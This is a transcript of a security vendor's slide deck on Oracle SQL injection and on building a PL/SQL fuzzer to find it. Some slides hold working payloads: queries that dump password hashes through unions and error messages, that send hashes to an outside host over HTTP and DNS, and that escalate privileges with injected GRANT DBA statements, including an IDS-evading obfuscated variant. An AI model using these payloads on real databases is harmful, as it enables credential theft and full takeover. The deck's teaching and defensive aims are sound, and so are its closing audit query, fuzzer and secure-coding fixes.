Hack Your DB Before The Hackers Do Todd DeSantis Sales Engineer - PowerPoint PPT Presentation

1
Hack Your DB Before The Hackers Do!
Todd DeSantis, Sales Engineer
2
What's This Presentation All About?
  • Explore common DB vulnerabilities
  • SQL injection
  • Create your custom fuzzer
    • What is a fuzzer anyway?
    • PL/SQL: the right tool for the right job
  • Bombs away

3
SQL Injection
  • Wikipedia: "SQL injection is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed."

4
SQL Injection
  • Exists in any layer of any application
    • C/S and web applications
    • Stored program units: built-in and user-created
  • Has many forms
    • Extra queries, unions, order by, sub-selects
  • Easily avoided
    • Bind variables, strong typing

5
SQL Injection Types
  • In-band: use the injection to return extra data
    • As part of the normal result set (unions)
    • In error messages
  • Out-of-band: use an alternative channel such as UTL_HTTP or DNS to extract the data
  • Blind / inference: no data is returned, but the attacker can infer it from return codes, error codes, timing measurements and more

6
SQL Injection: In-band
  The error message carries the data (here the username and password hash of the first DBA_USERS row):

  SQL> select utl_inaddr.get_host_name('127.0.0.1') from dual;
  localhost

  SQL> select utl_inaddr.get_host_name((select username||'='||password
         from dba_users where rownum=1)) from dual;
  select utl_inaddr.get_host_name((select username||'='||password from dba_users where rownum=1)) from dual
  *
  ERROR at line 1:
  ORA-29257: host SYS=8A8F025737A9097A unknown
  ORA-06512: at "SYS.UTL_INADDR", line 4
  ORA-06512: at "SYS.UTL_INADDR", line 35
  ORA-06512: at line 1

7
SQL Injection: Out-of-band
  • Send information via HTTP to an external site via HTTPURITYPE:
    select HTTPURITYPE('http://www.sentrigo.com/' ||
             (select password from dba_users where rownum=1)).getclob()
    from dual;
  • Send information via HTTP to an external site via UTL_HTTP:
    select utl_http.request('http://www.sentrigo.com/' ||
             (select password from dba_users where rownum=1))
    from dual;
  • Send information via DNS to an external site (a DNS label holds at most 63 bytes, so longer values have to be split across requests):
    select utl_http.request('http://www.' ||
             (select password from dba_users where rownum=1) || '.sentrigo.com/')
    from dual;
    DNS request seen at the attacker's name server: www.8A8F025737A9097A.sentrigo.com
    The host name is resolved before any HTTP connection is attempted, so the value leaks even when the HTTP request itself fails.

8
Blind SQL Injection
  • Nothing is returned; the attacker measures the response time instead. Pseudo-code:
    if the first character of the SYS password hash is 'A'
    then  select count(*) from all_objects, all_objects   -- slow: cross join
    else  select count(*) from dual                       -- fast
    end if
  • The same test as one statement that can be injected into a query:
    SELECT CASE
             WHEN (SELECT SUBSTR(password, 1, 1) FROM dba_users WHERE username = 'SYS') = 'A'
             THEN (SELECT COUNT(*) FROM all_objects, all_objects)
             ELSE (SELECT COUNT(*) FROM dual)
           END
    FROM dual;
  • Repeat per position and per candidate character: each guess leaks one bit through the delay

9
SQL Injection: Web Application
  • Username: ' or 1=1 --
  • The original statement looked like:
    'select * from users where username = ''' || username || ''' and password = ''' || password || ''''
  • The result:
    select * from users where username = '' or 1=1 --' and password = ''
  • This is not what we'll talk about

10
SQL Injection: PL/SQL
  • Two execution modes
    • Definer rights: the code runs with the privileges of its owner (e.g. SYS)
    • Invoker rights (AUTHID CURRENT_USER): the code runs with the caller's privileges
  • Source code is not always available
    • There are several un-wrappers available
  • One can find injections without the source
    • Find dependencies
    • Trial and error
    • v$sql
    • Fuzzer

11
SQL Injection: Demo Procedure
  CREATE OR REPLACE PROCEDURE LIST_TABLES(p_owner VARCHAR2)
  IS
    TYPE c_type IS REF CURSOR;
    l_cv   c_type;
    l_buff VARCHAR2(100);
  BEGIN
    dbms_output.enable(100000);
    -- vulnerable: p_owner is pasted into the statement text instead of being bound
    OPEN l_cv FOR 'SELECT object_name FROM all_objects WHERE owner = '''
                  || p_owner || ''' AND object_type = ''TABLE''';
    LOOP
      FETCH l_cv INTO l_buff;
      EXIT WHEN l_cv%NOTFOUND;
      dbms_output.put_line(l_buff);
    END LOOP;
    CLOSE l_cv;
  END;
  /

12
SQL Injection: Inject SQL
  SQL> set serveroutput on
  SQL> exec list_tables('SCOTT')
  DEPT
  EMP
  BONUS
  SALGRADE

  SQL> exec list_tables('KUKU'' UNION SELECT username || ''='' || password FROM dba_users--')
  BI=FA1D2B85B70213F3
  CTXSYS=71E687F036AD56E5
  DBSNMP=0B813E8C027CA786

  The statement the procedure actually opens (the -- comments out the rest of the original text):
  SELECT object_name FROM all_objects WHERE owner = 'KUKU' UNION SELECT username || '=' || password FROM dba_users--' AND object_type = 'TABLE'

13
SQL Injection: Inject Functions
  CREATE OR REPLACE FUNCTION get_dba
  RETURN VARCHAR2
  AUTHID CURRENT_USER
  IS
    PRAGMA AUTONOMOUS_TRANSACTION;   -- lets the DDL commit from inside a query
  BEGIN
    EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
    RETURN 'Hacked';
  END get_dba;
  /

14
SQL Injection: Inject Functions
  SQL> exec sys.list_tables('NOUSER'' || scott.get_dba()--')
  PL/SQL procedure successfully completed.
  SQL> @privs
  Roles for current user
  USERNAME                       GRANTED_ROLE
  ------------------------------ ------------
  SCOTT                          CONNECT
  SCOTT                          DBA
  SCOTT                          RESOURCE

  LIST_TABLES is a definer-rights procedure owned by SYS, so the query it builds runs as SYS; GET_DBA is invoker-rights, so the GRANT inside it runs as SYS too.

15
SQL Injection: Cursor Injection
  No attacker-owned function is needed: the block is parsed into a DBMS_SQL cursor and the injected text calls DBMS_SQL.EXECUTE on that cursor from inside the vulnerable SELECT.
  DECLARE
    l_cr NUMBER;
  BEGIN
    l_cr := dbms_sql.open_cursor;
    dbms_sql.parse(l_cr,
      'DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''GRANT dba to public''; END;',
      dbms_sql.native);
    -- the query becomes: ... WHERE owner = '' || dbms_sql.execute(<l_cr>) --' AND ...
    sys.list_tables(''' || dbms_sql.execute(' || l_cr || ') --');
  END;
  /

16
SQL Injection: IDS Evasion
  The slide-15 block again, but the GRANT text is obfuscated with a character substitution that TRANSLATE undoes at run time, so a signature-based IDS looking for GRANT or AUTONOMOUS_TRANSACTION in the statement text sees neither. The two key strings of TRANSLATE are shown as extracted; several characters were lost in this transcript.
  DECLARE
    l_cr NUMBER;
  BEGIN
    l_cr := dbms_sql.open_cursor;
    dbms_sql.parse(l_cr,
      translate('1vm3 43.l3 3795z5l572_93z23v965ze x.6z bv79 6ll1639 .3z9 1x3 95 47xm6ve z1e',
                '9876543210.,)(mnbvcxzlkjhgfdsapoiuytrewq',
                'qwertyuiopasdfghjklzxcvbnm(),.0123456789'''),
      dbms_sql.native);
    sys.list_tables(''' || dbms_sql.execute(' || l_cr || ') --');
  END;
  /

17
SQL Injection: Wrapping
  Wrapping hides the source text but does not remove the injection (and un-wrappers exist, see slide 10):
  CREATE OR REPLACE PACKAGE own_db wrapped
  a000000
  1
  abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd
  9
  62 92
  9lIown0XyYaBSui895eb0pSC9swg2JHf8upfOemZ7GbnvmzvT4nCxqyAlcztZ1ptv7ZMga3
  n6fHlbVac7MmcB19JJfqDkhynlrig0pwVDbao4q4lxWhPw8VPJ1yr6dDzmzm9BCQqbTDIhq
  /
  CREATE OR REPLACE PACKAGE BODY own_db wrapped
  a000000
  1
  abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd
  b
  118 13c
  ERNYhQ8lgvIjF5xjsIv4Vn7Mr5AwgnINfZqfHQCvw2qAkhIOLLtwRq0J3wTzXDZ2ACNSNZV
  q7ThHqgkvPIFf5BBRkG8BzmglrS29fqkyu2VjB4hbzufKqMzPtGCO2VS1/PgsqQBO0upKyeF
  tFs22G7gnian7xdfRCC8K997/O11lM36KxulqMhOFpfPEE//ts8T3Cr7sELbhsDV4kuqDBI
  6VX3Cs2jqxhIqgnhfrxClimWGyS8UMsw8tjQkPJwYzZGW8Gjd5fWMH9Doiqck5GjwT8ELf
  H06/kj/lPShfNA4QReEIGDd
  /

18
SQL Injection: Object Injection
  • Developers and DBAs never sanitize scripts that read object names out of the dictionary
    CREATE OR REPLACE FUNCTION f1 RETURN NUMBER
      AUTHID CURRENT_USER AS
      PRAGMA AUTONOMOUS_TRANSACTION;
    BEGIN
      EXECUTE IMMEDIATE 'GRANT DBA TO PUBLIC';
      RETURN 1;
    END;
    /
  • Then create an object whose name is the payload; a privileged script that concatenates the name into its own SQL ends up calling f1:
    create table "or 1=userxxx.f1" (a varchar2(1));

19
SQL Injection: Lateral Injection
  • Code does not have to receive parameters to be injected (David Litchfield wrote about this)
    EXECUTE IMMEDIATE 'update x set y = ''' || SYSDATE || '''';
  • SYSDATE is converted to text with the session's NLS_DATE_FORMAT, so running this first puts attacker-controlled text into the statement:
    alter session set nls_date_format = ''' and 1=hacker.attack() --';

20
Finding Vulnerable Code
  • Finding dynamic query code
    select * from dba_dependencies where referenced_name = 'DBMS_SQL';
    select * from dba_source where upper(text) like '%IMMEDIATE%';
  • Finding SYSDATE concatenation (lateral injection)
    select * from dba_source where upper(text) like '%SYSDATE%';
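The three searches above can be folded into one dictionary pass that also says how dangerous each hit is. The query below is an added example and not part of the deck; it assumes a user with SELECT on the DBA_SOURCE, DBA_PROCEDURES and DBA_TAB_PRIVS views and an Oracle release of 10g or later (DBA_PROCEDURES.AUTHID). Definer-rights units (they run as their owner) that PUBLIC may execute come out first, because an injection there is the get_dba scenario of slide 14.

```sql
-- Added example, not from the deck: one dictionary pass over the three searches above.
-- Needs SELECT on DBA_SOURCE, DBA_PROCEDURES and DBA_TAB_PRIVS (10g+ for AUTHID).
-- Wrapped units (slide 17) have no readable text in DBA_SOURCE; only the
-- DBA_DEPENDENCIES query on DBMS_SQL still finds those.
WITH dyn AS (
  SELECT owner, name, type, MIN(line) AS first_hit,
         SUM(CASE WHEN UPPER(text) LIKE '%EXECUTE IMMEDIATE%' THEN 1 ELSE 0 END) AS n_immediate,
         SUM(CASE WHEN UPPER(text) LIKE '%DBMS_SQL.PARSE%'   THEN 1 ELSE 0 END) AS n_dbms_sql,
         SUM(CASE WHEN UPPER(text) LIKE '%OPEN%FOR%''%'       THEN 1 ELSE 0 END) AS n_open_for,
         SUM(CASE WHEN UPPER(text) LIKE '%SYSDATE%'           THEN 1 ELSE 0 END) AS n_sysdate
  FROM   dba_source
  WHERE  type IN ('PROCEDURE', 'FUNCTION', 'PACKAGE BODY', 'TYPE BODY', 'TRIGGER')
  AND    owner NOT IN ('SYS', 'SYSTEM')      -- drop this line to audit Oracle-supplied code
  AND  ( UPPER(text) LIKE '%EXECUTE IMMEDIATE%'
      OR UPPER(text) LIKE '%DBMS_SQL.PARSE%'
      OR UPPER(text) LIKE '%OPEN%FOR%''%'    -- OPEN cur FOR '<string>' as in LIST_TABLES
      OR UPPER(text) LIKE '%SYSDATE%' )      -- candidate for the NLS_DATE_FORMAT trick
  GROUP BY owner, name, type
),
auth AS (
  -- AUTHID is a property of the unit, so one row per unit is enough
  SELECT DISTINCT owner, object_name, authid FROM dba_procedures
),
pub AS (
  SELECT owner, table_name FROM dba_tab_privs
  WHERE  grantee = 'PUBLIC' AND privilege = 'EXECUTE'
)
SELECT d.owner, d.name, d.type, a.authid,
       CASE WHEN p.table_name IS NOT NULL THEN 'YES' ELSE 'NO' END AS public_exec,
       d.n_immediate, d.n_dbms_sql, d.n_open_for, d.n_sysdate, d.first_hit
FROM   dyn d
LEFT JOIN auth a ON a.owner = d.owner AND a.object_name = d.name
LEFT JOIN pub  p ON p.owner = d.owner AND p.table_name = d.name
-- definer-rights units that PUBLIC can execute are the ones to read first
ORDER BY CASE WHEN a.authid = 'DEFINER' THEN 0 ELSE 1 END,
         public_exec DESC,
         d.n_immediate + d.n_dbms_sql + d.n_open_for DESC,
         d.owner, d.name;
```

The LIKE patterns are deliberately loose (they also match comments and bound dynamic SQL); the point is to rank what to read, not to prove a bug. A hit with n_immediate or n_open_for greater than zero and no bind variables in the source is what the fuzzer of the next slides is for.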

21
Fuzzing
  • "Fuzz testing or fuzzing is a software testing technique that provides random data ("fuzz") to the inputs of a program. If the program fails (for example, by crashing, or by failing built-in code assertions), the defects can be noted. The great advantage of fuzz testing is that the test design is extremely simple, and free of preconceptions about system behavior."

22
PL/SQL: The Right Tool
  • Easy to run SQL
  • Built into the database
  • Cross-platform
  • Good enough for the task
  • DBAs already speak it fluently
  • Can easily be scheduled as a DB job

23
Caution: Use With Care
  • Fuzzing on production is a big no-no
  • Be sure to get permission from the DB owner

24
Design
  • Track: use tables
    • Track fuzzing results
    • Rerun or restart tests after stopping or failing
  • Discovery: code to find interesting stored program units
  • Invoke: invocation code that calls the stored procedures with different edge-case parameters
  • Wrap: tie it up in a loop and wrap it in a package
  • Report: report the findings

25
Track: A Simple ERD Example
  FUZZ_SEARCH      (ID, TEXT)
  FUZZ_CODES       (SQL_CODE, DESCRIPTION)
  FUZZ_RUN         (ID, NAME, START_TS, END_TS)
  FUZZ_INPUT       (ID, DATATYPE, VALUE)
  FUZZED_OBJ       (ID, FUZZ_RUN_ID, OBJ_ID, METHOD_NAME, PARAMS, START_TS, END_TS, IS_VUL)
  FUZZED_EXEC      (ID, FUZZED_OBJ_ID, RESULT)
  FUZZED_EXEC_REC  (ID, FUZZED_EXEC_ID, ORD, VAL)
26
Discovery: Find Relevant Objects (screenshot, not in transcript)
27
Discovery: Find Interesting Ones (screenshot, not in transcript)
28
Discovery: Find Interesting Ones (screenshot, not in transcript)
Discovery Placing Data In Tables
  • Use all_arguments to get parameters
  • Optional - use dbms_describe
  • Find 'Language Java' in code and then use check
    the PL/SQL wrapper
  • Save the data for future re-runs

30
Invoke: Fuzzed Code
  • Use EXECUTE IMMEDIATE to invoke anonymous PL/SQL blocks built from the describe data
  • Pass in various interesting input parameters
    • Strings containing ' or "
    • Long strings
    • Nulls
    • Combinations
    • Off-by-one
  • For code that concatenates numbers and dates directly without formatting, also vary the session settings
    • NLS_DATE_FORMAT
    • NLS_NUMERIC_CHARACTERS

31
Invoking Fuzzed Code
  • Catch interesting errors: a SQL parse error means the input reached the statement text
    • ORA-00921: unexpected end of SQL command
    • ORA-00936: missing expression
    • ORA-00933: SQL command not properly ended
    • ORA-00970, ORA-00907, ORA-01756, ORA-00923, ORA-00900, PLS-00103, LPX-00601, ORA-00604
  • Crashes in C code
    • ORA-03113 (might also be an instance crash)
    • ORA-03114, ORA-01012
    • ORA-00600: internal error
  • etc.
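The Track / Discovery / Invoke / Wrap / Report steps of slides 24 to 31, carried through as one runnable package. This is an added example, not the deck's fuzzer: the table name FUZZ_RESULT, the package name FUZZ_PKG and the payload list are my own choices, and the discovery query is limited to procedures whose parameters are all IN VARCHAR2, which is where string concatenation bites. It assumes Oracle 10g or later (ALL_ARGUMENTS.SUBPROGRAM_ID), a test database, and a user with EXECUTE on the target schema's units.

```sql
-- Added example, not the deck's fuzzer: a minimal Track / Discover / Invoke / Report
-- loop in PL/SQL. Table, package and payload list are my own choices. Run it only on
-- a test database, as a user with EXECUTE on the target schema's units (10g+).
CREATE TABLE fuzz_result (
  run_ts TIMESTAMP DEFAULT SYSTIMESTAMP, owner VARCHAR2(128), unit_name VARCHAR2(261),
  payload VARCHAR2(4000), sqlcode NUMBER, sqlerrm VARCHAR2(4000));

CREATE OR REPLACE PACKAGE fuzz_pkg AS
  PROCEDURE run(p_owner IN VARCHAR2);          -- usage: EXEC fuzz_pkg.run('SCOTT')
END fuzz_pkg;
/
CREATE OR REPLACE PACKAGE BODY fuzz_pkg AS
  TYPE t_payloads IS TABLE OF VARCHAR2(4000);
  -- Inputs from slide 30: quote breakers, SQL fragments, a long string and NULL.
  g_payloads CONSTANT t_payloads := t_payloads(
    q'[']', q'["]', q'[' OR 1=1 --]', q'[' UNION SELECT user FROM dual --]',
    q'[x' || user || ']', RPAD('A', 4000, 'A'), NULL);

  -- Slide 31: parse errors mean the input reached the statement text; the last four
  -- are crashes. ORA-06550 counts only for PLS-00103 (syntax), since PLS-00201
  -- (unknown unit or missing EXECUTE privilege) is noise.
  FUNCTION is_interesting(p_code IN NUMBER, p_msg IN VARCHAR2) RETURN BOOLEAN IS
  BEGIN
    RETURN p_code IN (-900, -907, -921, -923, -933, -936, -970, -1756, -604,
                      -600, -3113, -3114, -1012)
        OR (p_code = -6550 AND p_msg LIKE '%PLS-00103%');
  END is_interesting;

  -- Invoke through DBMS_SQL so that any number of parameters can be bound.
  PROCEDURE invoke(p_call IN VARCHAR2, p_nargs IN PLS_INTEGER, p_payload IN VARCHAR2,
                   o_code OUT NUMBER, o_msg OUT VARCHAR2) IS
    l_cur INTEGER := dbms_sql.open_cursor;
    l_rc  INTEGER;
  BEGIN
    dbms_sql.parse(l_cur, p_call, dbms_sql.native);
    FOR i IN 1 .. p_nargs LOOP
      dbms_sql.bind_variable(l_cur, ':p' || i, p_payload);
    END LOOP;
    l_rc := dbms_sql.execute(l_cur);
    dbms_sql.close_cursor(l_cur);
    o_code := 0; o_msg := NULL;
  EXCEPTION WHEN OTHERS THEN
    o_code := SQLCODE; o_msg := SUBSTR(SQLERRM, 1, 4000);
    IF dbms_sql.is_open(l_cur) THEN dbms_sql.close_cursor(l_cur); END IF;
  END invoke;

  PROCEDURE run(p_owner IN VARCHAR2) IS
    l_call VARCHAR2(4000); l_unit VARCHAR2(261); l_code NUMBER; l_msg VARCHAR2(4000);
    l_hits PLS_INTEGER := 0;
  BEGIN
    -- Discover: procedures (no POSITION 0 return row) whose parameters are all IN VARCHAR2.
    FOR r IN (SELECT owner, package_name, object_name, subprogram_id,
                     COUNT(argument_name) AS nargs
              FROM   all_arguments
              WHERE  owner = UPPER(p_owner) AND data_level = 0
              GROUP BY owner, package_name, object_name, subprogram_id
              HAVING COUNT(argument_name) > 0
                 AND SUM(CASE WHEN position = 0 THEN 1 ELSE 0 END) = 0
                 AND COUNT(argument_name) = SUM(CASE WHEN data_type = 'VARCHAR2'
                                                      AND in_out = 'IN' THEN 1 ELSE 0 END)
              ORDER BY package_name, object_name)
    LOOP
      l_unit := CASE WHEN r.package_name IS NOT NULL THEN r.package_name || '.' END || r.object_name;
      -- Build:  BEGIN "OWNER"."PKG"."PROC"(:p1, :p2, ...); END;
      l_call := 'BEGIN ' || sys.dbms_assert.enquote_name(r.owner, FALSE) || '.'
             || CASE WHEN r.package_name IS NOT NULL
                     THEN sys.dbms_assert.enquote_name(r.package_name, FALSE) || '.' END
             || sys.dbms_assert.enquote_name(r.object_name, FALSE) || '(';
      FOR i IN 1 .. r.nargs LOOP
        l_call := l_call || CASE WHEN i > 1 THEN ', ' END || ':p' || i;
      END LOOP;
      l_call := l_call || '); END;';
      -- Invoke with every payload; Track only the interesting outcomes.
      FOR i IN 1 .. g_payloads.COUNT LOOP
        invoke(l_call, r.nargs, g_payloads(i), l_code, l_msg);
        ROLLBACK;                 -- undo the target's work (unless it committed itself)
        IF is_interesting(l_code, l_msg) THEN
          INSERT INTO fuzz_result (owner, unit_name, payload, sqlcode, sqlerrm)
          VALUES (r.owner, l_unit, g_payloads(i), l_code, l_msg);
          COMMIT;
          l_hits := l_hits + 1;
        END IF;
      END LOOP;
    END LOOP;
    -- Report: the table keeps the details, the summary goes to DBMS_OUTPUT.
    dbms_output.put_line('fuzz_pkg.run: ' || l_hits || ' suspicious result(s) in ' || UPPER(p_owner));
  END run;
END fuzz_pkg;
/
```

The payloads are bound, never concatenated, into the generated call, so an error can only come from what the target unit does with them: against LIST_TABLES from slide 11 the lone-quote payload produces an unterminated literal (ORA-01756) and lands in FUZZ_RESULT, while a unit that binds its own inputs stays silent. SELECT unit_name, payload, sqlcode FROM fuzz_result ORDER BY run_ts is the report; the NLS_DATE_FORMAT and NLS_NUMERIC_CHARACTERS variations of slide 30 would be added as ALTER SESSION calls around the inner loop.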

32
Example Interface (screenshot, not in transcript)
33
Example Interface (screenshot, not in transcript)
34
Example Interface (screenshot, not in transcript)
Bombs Away
  • Running as DBA on Oracle supplied code can be
    very interesting
  • Sentrigo Red Team discovered multiple
    vulnerabilities this way
  • Reported to Oracle
  • Protected by Hedgehog out of the box

36
Other Fuzzers Out There
  • Inguma PL/SQL fuzzer
    • Written by Joxean Koret
    • Python
    • http://inguma.sourceforge.net/
  • SPIKE
    • Not Oracle-specific
    • Used to analyze and fuzz network protocols
    • http://www.immunityinc.com/resources-freesoftware.shtml

37
Write Secure Code
  • The least-privilege principle
    • Lock down packages: system access, file access, network access
  • Use secure coding techniques
    • Bind variables
    • Input validation
    • Clear ownership of security issues
  • DBMS_ASSERT
    • Provided by Oracle and backported to older databases

38
Bind Variables: Java
  Statement stmt = conn.createStatement();
  ResultSet rs = stmt.executeQuery(
      "select * from users where username = '" + username + "'");
  vs.
  PreparedStatement pstmt = conn.prepareStatement(
      "select * from users where username = ?");
  pstmt.setString(1, username);
  ResultSet rs = pstmt.executeQuery();

39
Bind Variables: PL/SQL - Bad
  CREATE OR REPLACE FUNCTION get_id_or_boss(p_ename VARCHAR2, p_boss NUMBER)
  RETURN VARCHAR2 IS
    v_empno emp.empno%TYPE;
  BEGIN
    IF p_boss = 0 THEN
      -- p_ename becomes part of the statement text
      EXECUTE IMMEDIATE 'SELECT empno FROM emp WHERE ename = ''' || p_ename || ''''
        INTO v_empno;
    ELSE
      EXECUTE IMMEDIATE 'SELECT mgr FROM emp WHERE ename = ''' || p_ename || ''''
        INTO v_empno;
    END IF;
    RETURN v_empno;
  END get_id_or_boss;
  /

40
Bind Variables: PL/SQL - Good
  CREATE OR REPLACE FUNCTION get_id_or_boss(p_ename VARCHAR2, p_boss NUMBER)
  RETURN VARCHAR2 IS
    v_sql   VARCHAR2(2000);
    v_empno emp.empno%TYPE;
  BEGIN
    IF p_boss = 0 THEN
      v_sql := 'SELECT empno FROM emp WHERE ename = :1';
    ELSE
      v_sql := 'SELECT mgr FROM emp WHERE ename = :1';
    END IF;
    -- the statement text is constant; p_ename is passed as a bind value
    EXECUTE IMMEDIATE v_sql INTO v_empno USING p_ename;
    RETURN v_empno;
  END get_id_or_boss;
  /

41
Input Validation: DBMS_ASSERT
  • Functions
    • NOOP
    • SIMPLE_SQL_NAME
    • QUALIFIED_SQL_NAME
    • SCHEMA_NAME
    • SQL_OBJECT_NAME
    • ENQUOTE_NAME
    • ENQUOTE_LITERAL
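Binds (slide 40) cover values; DBMS_ASSERT covers the case a bind cannot: an untrusted string that has to become an identifier in the statement text. The block below, an added example and not code from the deck, fixes LIST_TABLES from slide 11 both ways. LIST_TABLES_SAFE and TABLE_ROW_COUNT are my own names; the demo assumes the deck's SCOTT.EMP table and a session with EXECUTE on SYS.DBMS_ASSERT (granted to PUBLIC by default).

```sql
-- Added example, not from the deck: the two ways to fix LIST_TABLES (slide 11).
-- Procedure and function names are my own; the demo uses the deck's SCOTT.EMP.

-- 1) The owner is compared as a value, so bind it: no string building at all.
CREATE OR REPLACE PROCEDURE list_tables_safe(p_owner IN VARCHAR2) IS
  TYPE c_type IS REF CURSOR;
  l_cv   c_type;
  l_buff VARCHAR2(128);
BEGIN
  OPEN l_cv FOR
    'SELECT object_name FROM all_objects WHERE owner = :own AND object_type = ''TABLE'''
    USING p_owner;
  LOOP
    FETCH l_cv INTO l_buff;
    EXIT WHEN l_cv%NOTFOUND;
    dbms_output.put_line(l_buff);
  END LOOP;
  CLOSE l_cv;
END list_tables_safe;
/

-- 2) An identifier cannot be bound. When the untrusted value has to become part of
--    the statement text, validate each part with SYS.DBMS_ASSERT and quote it with
--    ENQUOTE_NAME, so only a well-formed identifier is ever concatenated:
--      SCHEMA_NAME      raises ORA-44001 if the schema does not exist
--      SIMPLE_SQL_NAME  raises ORA-44003 if the string is not a plain SQL identifier
--      ENQUOTE_NAME     wraps the name in double quotes and rejects embedded quotes
CREATE OR REPLACE FUNCTION table_row_count(p_owner IN VARCHAR2, p_table IN VARCHAR2)
  RETURN NUMBER IS
  l_owner VARCHAR2(130);
  l_table VARCHAR2(130);
  l_cnt   NUMBER;
BEGIN
  l_owner := sys.dbms_assert.enquote_name(sys.dbms_assert.schema_name(UPPER(p_owner)));
  l_table := sys.dbms_assert.enquote_name(sys.dbms_assert.simple_sql_name(UPPER(p_table)));
  EXECUTE IMMEDIATE 'SELECT COUNT(*) FROM ' || l_owner || '.' || l_table INTO l_cnt;
  RETURN l_cnt;
END table_row_count;
/

-- Demo: the slide-12 payload is rejected before any SQL is built.
SET SERVEROUTPUT ON
DECLARE
  e_bad_name EXCEPTION;
  PRAGMA EXCEPTION_INIT(e_bad_name, -44003);
BEGIN
  dbms_output.put_line('EMP rows: ' || table_row_count('SCOTT', 'EMP'));
  BEGIN
    dbms_output.put_line(table_row_count('SCOTT',
      q'[KUKU' UNION SELECT username || '=' || password FROM dba_users--]'));
  EXCEPTION
    WHEN e_bad_name THEN
      dbms_output.put_line('rejected: ' || SQLERRM);   -- ORA-44003: invalid SQL name
  END;
END;
/
```

The fully qualified SYS.DBMS_ASSERT follows the rule on slide 43: an unqualified DBMS_ASSERT would resolve to a same-named package or synonym in the caller's schema first. Note that SIMPLE_SQL_NAME only checks syntax; whether the caller may read the table is still decided by the normal privilege check when the SELECT runs.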

42
Secure Coding Policies
  • Set up secure coding policies for the different languages
  • Make the coding policies part of every contract, external and internal
  • Default document for all developers
  • OWASP

43
Some Coding Rules
  • Avoid hard-coding usernames/passwords
  • Wrap sensitive/important program code, even though wrapping alone is not really safe
  • Use fully qualified names for function and procedure calls (e.g. SYS.DBMS_ASSERT), so a same-named object in the caller's schema cannot be substituted
  • Always validate user/database input
  • Be careful with dynamic statements (cursors, SQL statements, ...)
  • Be careful with file access
  • Be careful with OS command execution

44
Protecting Your Database
  • Try out the Hedgehog - http://www.sentrigo.com
    • Virtual patching
    • SQL injection protection
    • Fine-grained auditing
    • Centralized management
    • More

45
Questions?